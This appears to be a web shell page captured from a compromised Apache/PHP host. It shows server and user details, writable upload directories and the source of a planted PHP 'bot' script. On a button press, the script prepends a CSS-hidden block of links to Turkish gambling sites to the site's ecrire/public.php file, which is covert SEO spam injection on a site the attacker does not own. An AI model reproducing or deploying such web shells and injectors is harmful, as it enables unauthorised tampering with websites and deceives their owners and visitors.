Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/universe/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/universe/p4332x61.php
<?php

// Backlink ekleme işlemi
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Eklenecek backlink kodu
    $backlinkCode = '<span style="position: absolute; left: -3355px;">
<a href="https://betlikeuye.site/" title="Betlike Resmi Sitesine Giriş Yap & Kayıt Ol">Betlike</a>

<a href="https://betvoleuye.site/" title="Betvole Resmi Sitesine Giriş Yap & Üye Ol">Betvole</a>

<a href="https://betebetuye.site/" title="Betebet Resmi Sitesine Giriş Yap & Kayıt Ol">Betebet</a>

<a href="https://galabetaktif.com/" title="Galabet Resmi Sitesine Giriş Yap & Üye Ol">Galabet</a>

<a href="https://padisahbetgirisadresi.net/" title="Padişahbet Resmi Sitesine Giriş Yap & Üye Ol">Padişahbet</a>

<a href="https://casinolevantsitesi.com/" title="Casinolevant Resmi Sitesine Giriş Yap & Üye Ol">Casinolevant</a>



</span>' . PHP_EOL;

    // Ecrire klasörünün yolu
    $ecrireDir = __DIR__ . DIRECTORY_SEPARATOR . 'ecrire';

    // public.php dosyasının yolu
    $publicFilePath = $ecrireDir . DIRECTORY_SEPARATOR . 'public.php';

    // public.php dosyasını kontrol ve düzenleme işlemi
    if (file_exists($publicFilePath)) {
        // Dosya içeriğini oku
        $fileContents = file_get_contents($publicFilePath);

        // Backlink zaten var mı kontrol et
        if (strpos($fileContents, $backlinkCode) === false) {
            // Backlinki dosyanın en üstüne ekle
            $newContents = $backlinkCode . $fileContents;

            // Dosyayı yeni içerikle yaz
            if (file_put_contents($publicFilePath, $newContents)) {
                echo "Backlink başarıyla eklendi: $publicFilePath\n";
            } else {
                echo "Dosyaya yazma hatası: $publicFilePath\n";
            }
        } else {
            echo "Backlink zaten mevcut: $publicFilePath\n";
        }
    } else {
        echo "public.php dosyası bulunamadı: $publicFilePath\n";
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Bot PHP</title>
</head>
<body>
    <form method="post">
        <button type="submit">EKLE</button>
    </form>
</body>
</html>

SAMX